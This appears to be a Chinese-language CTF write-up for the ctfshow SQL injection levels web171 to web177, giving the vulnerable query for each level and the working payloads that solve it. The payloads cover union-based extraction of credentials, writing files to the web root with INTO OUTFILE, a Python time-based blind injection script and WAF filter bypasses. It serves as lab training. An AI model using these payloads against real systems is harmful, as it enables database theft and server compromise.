web171
sql语句 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";
第一题的sql注入是没有什么注入的,直接使用万能注入,payload1' or 1=1 --+
或者先获得表名,然后查询
1.payload1' union select 1,2,database() --+
或者union select 1,2,schema_name from information_schema.schemata
,获得数据库的名字
2.payload1' union select 1,2,table_name from information_schema.tables where table_schema=database() --+
,获得表的名字
3.payload1' union select 1,2,column_name from information_schema.columns where table_name='ctfshow_user' --+
获得列的名字
4.payload1' union select id,username,password from ctfshow_user --+
得到flag
web172
查询语句
//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;";
返回逻辑
//检查结果是否有flag
if($row->username!=='flag'){
$ret['msg']='查询成功';
}
首先这一题比上一题多加了查询返回的username值是否有flag,但是我们要的flag在password中,所以并不影响
- ```sql
payload:1’ union select 1,database() –+
payload:1’ union select 1,table_name from information_schema.tables where table_schema=database() –+
payload:1’ union select 1,column_name from information_schema.columns where table_name=’ctfshow_user2’ –+
payload:1’ union select 1,password from ctfshow_user2 –+- ```sql payload:1' union select to_base64(username),password from ctfshow_user2 where username='flag' --+
知识点1.编码函数to_base64(),hex()。
web173
查询语句
//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user3 where username !='flag' and id = '".$_GET['id']."' limit 1;";
返回逻辑
//检查结果是否有flag
if(!preg_match('/flag/i', json_encode($ret))){
$ret['msg']='查询成功';
}
同web172
web174
查询语句
//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";
返回逻辑
//检查结果是否有flag
if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
$ret['msg']='查询成功';
}
返回的数值中不能有flag和数字,可以使用sql的replace替换,把数字替换成字母,然后再写一个脚本替换回来
payload1' union select 'a',replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password,'0','numa'),'1','numb'),'2','numc'),' 3','numd'),'4','nume'),'5','numf'),'6','numg'),'7','numh'),'8','numi'),'9','numj') from ctfshow_user4 --+
然后是替换的脚本
a = 'ctfshow{fnumcnumjdnumfnumbnuminumi-numgnumcnuminuma-numeabe-numjnuminumfd-eanuminumgnumfnumbnumenumbnumbnumgnumcnumc}'
a= a.replace('numa',"0")
a= a.replace('numb',"1")
a= a.replace('numc',"2")
a= a.replace('numd',"3")
a= a.replace('nume',"4")
a= a.replace('numf',"5")
a= a.replace('numg',"6")
a= a.replace('numh',"7")
a= a.replace('numi',"8")
a= a.replace('numj',"9")
print(a)
即可得到flag
web175
查询语句
//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user5 where username !='flag' and id = '".$_GET['id']."' limit 1;";
返回逻辑
//检查结果是否有flag
if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){
$ret['msg']='查询成功';
}
过滤了ascii字符,我们可以使用盲注或者利用读写文件写入网站根目录
解法一
1' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt'--+
然后访问1.txt即可
解法二
# @Author:Y4tacker
import requests
url = "http://57e00653-fc1c-474b-9281-8f1dffb0bc34.challenge.ctf.show:8080/api/v5.php?id=1' and "
result = ''
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
payload = f'1=if(ascii(substr((select password from ctfshow_user5 where username=\'flag\' limit 0,1),{i},1))>{mid},sleep(2),0) -- -'
try:
r = requests.get(url + payload, timeout=0.5)
tail = mid
except Exception as e:
head = mid + 1
if head != 32:
result += chr(head)
else:
break
print(result)
web176
查询语句
//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
返回逻辑
//对传入的参数进行了过滤
function waf($str){
//代码过于简单,不宜展示
}
首先payload1' union select 1,2,password from ctfshow_user --+
报错了,因为sql对大小写不敏感,所以先试试大小写过滤。payload1' union sElect 1,2,password from ctfshow_user --+
发现可以过。
web177
查询语句
//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
返回逻辑
//对传入的参数进行了过滤
function waf($str){
//代码过于简单,不宜展示
}
先输入1’–+,发现无数据,换一种注释的方式payload1'%23
发现可以,猜测过滤了空格,首先试试万能密码
解法一:payload1'or(1=1)%23
知识点:在sql中/**/可以表示空格
解法二:payload1'/**/union/**/select/**/1,username,password/**/from/**/ctfshow_user/**/where/**/username='flag'/**/limit/**/1,1%23